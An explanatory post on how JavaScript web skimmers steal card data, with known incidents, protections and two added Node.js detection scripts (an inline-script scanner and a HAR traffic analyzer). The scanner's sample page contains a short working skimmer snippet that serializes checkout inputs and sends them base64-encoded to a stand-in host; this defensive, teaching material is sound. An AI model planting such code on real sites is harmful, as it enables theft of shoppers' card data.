How does a web skimmer work?

chushpan

A web skimmer (or JS skimmer) is a malicious script that is embedded on legitimate websites to steal users' bank card data. Unlike traditional skimming devices that are installed on ATMs or terminals, web skimmers operate over the Internet and target online payments. Let's look at how a web skimmer works, its main stages, and protection methods.

1. The main purpose of a web skimmer

The purpose of a web skimmer is to intercept the bank card data that users type into checkout forms on infected websites:
  • Card number (PAN).
  • Expiry date.
  • CVV/CVC code.
  • Cardholder's name.

Many skimmers simply serialize every field of the form, so the billing address, phone number and e-mail entered on the same page are captured as well. The data is then sent to the attackers and used for fraudulent operations (e.g. carding).

2. How does a web skimmer work?

2.1. Malicious code injection

Attackers inject malicious JavaScript into the target website. This can be done in several ways:
  • Website compromise: Hacking the admin panel or CMS (e.g. WordPress, Magento) and editing a template, a theme file or a content block stored in the database.
  • Attacks on third-party providers: Compromising a script that the site loads from someone else's server (e.g. analytics, support chats, tag managers). One compromised script is then served to every site that embeds it.
  • Exploiting vulnerable plugins: Exploiting vulnerabilities in popular plugins or JavaScript libraries to write the skimmer into files the site already serves.
  • Phishing website owners: Deceiving administrators into handing over credentials that give access to the site.

2.2. Data interception

Once injected, the malicious script runs in the victim's browser every time the infected page is loaded:
  • Data entry monitoring: The script locates the input fields on the payment page (by name, id or simply every input on the form) and attaches listeners to input, change, click or submit events.
  • Information interception: When the user enters card details and clicks "Pay", the script reads the field values and serializes them.
  • Activity hiding: The script is written to look like legitimate code and does not interfere with the payment, which goes through normally, so the victim notices nothing.

2.3. Transferring data to an attacker

The collected data is sent to a server under the attacker's control via:
  • Hidden requests: An HTTP/HTTPS request to a remote server, often disguised as an analytics beacon (an image load, a fetch/XMLHttpRequest call or navigator.sendBeacon) with the card data encoded in the URL or the request body.
  • API: Cloud storage or a specialized collection platform rather than a server the attacker owns directly.
  • Telegram bots: Modern web skimmers often post the data straight to a Telegram chat through the Bot API, which is fast and needs no infrastructure of its own.

2.4. Removing traces and evading detection

To avoid detection:
  • Attackers can temporarily disable the script, for example when browser developer tools are open or for visitors who do not look like real shoppers.
  • The transmitted data is encoded or encrypted (base64, XOR or a real cipher) so that it does not look like card numbers in traffic logs.
  • The code is disguised as a legitimate website element: a file named after a well-known library, or an obfuscated blob appended to an existing script.
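The three stages above leave fingerprints in the page itself that a defender can look for. The following Node.js script is an added example written for this page, not code from the original post: it pulls every `<script>` out of a page's HTML, lists external script hosts that are not on a first-party allowlist, and flags inline scripts that combine a hook on payment fields with a network send, a Telegram Bot API URL or a packed base64 blob. The allowlist (shop.example, cdn.shop.example), the regex heuristics and the sample page with its injected script are all constructed for the example.

```javascript
// Added example for this page (not from the original post): a static scan of a
// page's HTML for the fingerprints of the skimmer stages described above.
// Run with Node 18+. The first-party allowlist, the heuristics and SAMPLE_PAGE
// (including the "injected" script) are all constructed for this example.

const FIRST_PARTY = new Set(['shop.example', 'cdn.shop.example']); // assumed allowlist
const PAGE_BASE = 'https://shop.example/checkout';                // assumed page URL

// Stage 2.2: code that looks for card fields and hooks user input or submission.
const CARD_FIELD_RE = /\b(cc[-_]?num(?:ber)?|card[-_]?number|cvv|cvc|expir(?:y|ation)|cardholder)\b/i;
const HOOK_RE = /(?:addEventListener\s*\(\s*['"](?:input|change|submit|click|keyup)['"]|querySelectorAll\s*\(\s*['"]input|onsubmit\b|\.submit\s*\()/i;
// Stage 2.3: a way to send data out, including the Telegram Bot API pattern.
const SEND_RE = /(?:\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*=)/i;
const TELEGRAM_RE = /api\.telegram\.org\/bot\d+:[A-Za-z0-9_-]+/i;
// Stage 2.4: packed code decoded at runtime.
const PACKED_RE = /atob\s*\(\s*['"][A-Za-z0-9+/=]{40,}['"]\s*\)/;

// Pull every <script> tag out of the HTML: its src (if any), its body, and
// whether it carries an integrity attribute (SRI).
function extractScripts(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2], sri: /\bintegrity\s*=/i.test(m[1]) });
  }
  return scripts;
}

function scanSkimmerIndicators(html) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      // External script: report any host that is not ours, and whether SRI pins it.
      const host = new URL(s.src, PAGE_BASE).hostname;
      if (!FIRST_PARTY.has(host)) findings.push({ kind: 'third-party-script', detail: host, sri: s.sri });
      continue;
    }
    // Inline script: require at least two independent indicators to cut noise.
    const hits = [];
    if (CARD_FIELD_RE.test(s.body) && HOOK_RE.test(s.body)) hits.push('hooks-card-fields');
    if (SEND_RE.test(s.body)) hits.push('network-send');
    if (TELEGRAM_RE.test(s.body)) hits.push('telegram-bot');
    if (PACKED_RE.test(s.body)) hits.push('packed-code');
    if (hits.length >= 2) findings.push({ kind: 'suspicious-inline-script', detail: hits.join(','), sri: false });
  }
  return findings;
}

// Constructed sample: a first-party app script pinned with SRI, an unpinned
// script from an unknown host, and an inline skimmer hooking the checkout form.
const SAMPLE_PAGE = `<html><head>
<script src="https://cdn.shop.example/app.js" integrity="sha384-AAAA"></script>
<script src="https://stats-collect.example.net/a.js"></script>
</head><body>
<form id="checkout"><input name="cardnumber"><input name="cvv"><button>Pay</button></form>
<script>
  document.addEventListener('submit', function () {
    if (!document.querySelector('input[name=cardnumber]')) return;
    var d = {};
    document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
    new Image().src = 'https://stats-collect.example.net/p.gif?d=' + btoa(JSON.stringify(d));
  });
</script>
<script>console.log('page ready');</script>
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanSkimmerIndicators(SAMPLE_PAGE)) console.log(f);
}
```

Run against the sample page it reports the unpinned stats-collect.example.net script and the inline script that both hooks the card fields and sends data out; the legitimate first-party script and the harmless inline `console.log` produce nothing. The two-indicator threshold is what keeps ordinary analytics or form-validation code from being flagged; a real deployment would diff the findings against the previous crawl rather than review them from scratch every time.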

3. Where are web skimmers used?

3.1. Online stores

  • Web skimmers are most often deployed on popular websites with high payment volumes:
    • Online retailers.
    • Ticket sales platforms.
    • Subscription services.

3.2. Banking websites

  • Attackers can also target bank and payment-provider websites, especially those that host card-entry forms for online payments.

3.3. Online payment forms

  • Any form where users enter card details can become a target:
    • Donations.
    • Payments for services.

4. Examples of known attacks using web skimmers

4.1. Magecart

  • Not a single group but an umbrella name for several groups that skim online stores; the name comes from the Magento e-commerce platform their early attacks targeted:
    • They injected malicious code into the site's own JavaScript or into third-party libraries the site loaded.
    • Victims in 2018 included large companies such as British Airways (code injected directly into the site's checkout script) and Ticketmaster (via a compromised third-party support-chat script).

4.2. Volusion

  • In 2019, the e-commerce platform Volusion was hacked and malicious code was served to thousands of its customers' storefronts from a single compromised storage location.

4.3. WooCommerce and Shopify

  • Stores on these popular platforms have also been hit, usually through vulnerable plugins, themes or third-party apps rather than through the platform itself.

5. How to protect yourself from web skimmers

5.1 For users

  • Use secure payment methods:
    • Apple Pay, Google Pay or other tokenized systems, where the merchant page never sees the real card number.
    • Disposable virtual cards with a spending limit, so a stolen number is worth little.
  • Check the website URL:
    • Make sure you are on the official website. This protects against look-alike phishing sites; a skimmed checkout on the real site looks identical to a clean one.
  • Update your browser:
    • Browsers block known malicious domains through safe-browsing lists, and updates close the bugs an injected script could exploit. They cannot tell a skimmer from a legitimate script on their own.
  • Use antivirus software:
    • Some antivirus products and browser extensions block requests to known skimmer domains.

5.2 For website owners

  • Check the code regularly:
    • Compare the deployed files with a clean copy (version control, known-good hashes) and look for unexpected external script hosts or changed content blocks in the database.
  • Update CMS and plugins:
    • Vulnerabilities often arise due to outdated software.
  • Use Content Security Policy (CSP) and Subresource Integrity (SRI):
    • script-src restricts where scripts may load from; connect-src and img-src restrict where the page may send data, which blocks the exfiltration stage even if a script does get injected; SRI makes the browser refuse a third-party script whose hash has changed.
  • Monitor traffic:
    • Use tools to record the outgoing requests made by your checkout page and alert on any host that is not on your allowlist.
  • Encrypt data:
    • Use HTTPS to protect user data in transit. Note that HTTPS does not stop a skimmer: the script runs inside the page and reads the data before it is encrypted.

6. What to do if your site has become a victim of a web skimmer

6.1. Attack detection

  • Check the site's source code for suspicious scripts: diff the served HTML and JavaScript against a known-good copy and list every external host a script is loaded from.
  • Analyze outgoing traffic: load the checkout page in a test browser and record every request it makes (for example as a HAR file); anything going to a host you do not recognize is suspect.
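The traffic check above, and the "monitor traffic" advice in section 5.2, can be automated over a HAR recording of the checkout page. The Node.js script below is an added example written for this page, not code from the original post: it walks the HAR entries, skips hosts on an allowlist, and for everything else decodes base64 blobs in the query string and POST body and runs a Luhn check, so a request that actually carries a card number is escalated above a merely unknown host. The allowlist, the hosts and the sample HAR (including the test card number 4111111111111111) are constructed for the example.

```javascript
// Added example for this page (not from the original post): analyze the outgoing
// requests recorded from a checkout page (HAR format, as exported by browser
// developer tools or a headless browser) and flag requests to unknown hosts,
// escalating when the request carries something that decodes to a card number.
// Run with Node 18+. The allowlist and SAMPLE_HAR are constructed for the example.

const ALLOWED_HOSTS = new Set(['shop.example', 'cdn.shop.example', 'api.payments.example']);

// Luhn check: filters random digit runs down to plausible card numbers (13-19 digits).
function luhnValid(digits) {
  if (!/^\d{13,19}$/.test(digits)) return false;
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

function findCardNumbers(text) {
  return (text.match(/\d{13,19}/g) || []).filter(luhnValid);
}

// Skimmers usually base64-encode the payload (stage 2.4): decode every run that
// looks like base64 or URL-safe base64 and keep the ones that decode to printable text.
function decodeBase64Blobs(text) {
  const out = [];
  for (const blob of text.match(/[A-Za-z0-9+/_-]{16,}={0,2}/g) || []) {
    const decoded = Buffer.from(blob.replace(/-/g, '+').replace(/_/g, '/'), 'base64').toString('utf8');
    if (/^[\x20-\x7e\s]+$/.test(decoded)) out.push(decoded);
  }
  return out;
}

// decodeURIComponent throws on malformed escapes, which real traffic does contain.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

function analyzeHar(har, allowedHosts) {
  const pages = new Map(har.log.pages.map((p) => [p.id, p.title]));
  const findings = [];
  for (const entry of har.log.entries) {
    const url = new URL(entry.request.url);
    if (allowedHosts.has(url.hostname)) continue; // expected traffic
    // Everything the request carries: decoded query string plus POST body.
    const raw = safeDecode(url.search.slice(1)) + '\n' + (entry.request.postData?.text || '');
    const pans = new Set([raw, ...decodeBase64Blobs(raw)].flatMap(findCardNumbers));
    findings.push({
      page: pages.get(entry.pageref) || 'unknown',
      host: url.hostname,
      method: entry.request.method,
      cardNumbersFound: pans.size,
      severity: pans.size > 0 ? 'card-data-exfil' : 'unknown-host',
    });
  }
  return findings;
}

// Constructed HAR: the checkout page loads its own app script, posts a payment
// token to the real payment API, and (the skimmer) fires an image request to an
// unknown host with the serialized form in a base64 query parameter.
const SKIMMED = Buffer.from(JSON.stringify({ cardnumber: '4111111111111111', cvv: '123', exp: '12/27' })).toString('base64');
const SAMPLE_HAR = {
  log: {
    pages: [{ id: 'page_1', title: 'https://shop.example/checkout' }],
    entries: [
      { pageref: 'page_1', request: { method: 'GET', url: 'https://cdn.shop.example/app.js' } },
      { pageref: 'page_1', request: { method: 'POST', url: 'https://api.payments.example/charge', postData: { text: '{"token":"tok_abc"}' } } },
      { pageref: 'page_1', request: { method: 'GET', url: 'https://stats-collect.example.net/p.gif?d=' + encodeURIComponent(SKIMMED) } },
    ],
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of analyzeHar(SAMPLE_HAR, ALLOWED_HOSTS)) console.log(f);
}
```

On the sample recording only the image request to stats-collect.example.net is reported, and because its query parameter decodes to JSON containing a Luhn-valid 16-digit number it is marked card-data-exfil rather than just unknown-host. Run the same recording after a fix and the host should disappear; an encrypted (not merely encoded) payload will still show up as unknown-host, which is why the allowlist, not the content check, is the primary signal.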

6.2. Removing the vulnerability

  • Remove the malicious code from every place it was written (files, database content, third-party tags) and close the entry point that was used.
  • Rotate administrator and database credentials, since the attacker had write access to the site.
  • Update all website components (CMS, plugins, themes).

6.3. Notification to users

  • Notify users about the potential leak of their card data, and notify your payment processor.
  • Recommend that they check their statements and block or reissue their cards.

6.4. Strengthening security

  • Implement additional security measures (e.g. CSP, SRI, file integrity monitoring, two-factor authentication for administrators).

Conclusion​

Web skimmers pose a serious threat to users and website owners, as they allow attackers to steal bank card details directly during online payments. However, most attacks can be prevented by following security rules and regularly checking the site for vulnerabilities.

The main conclusion: Website owners should pay special attention to protecting their platforms, and users should use secure payment methods and be careful about the sites where they enter card details.
 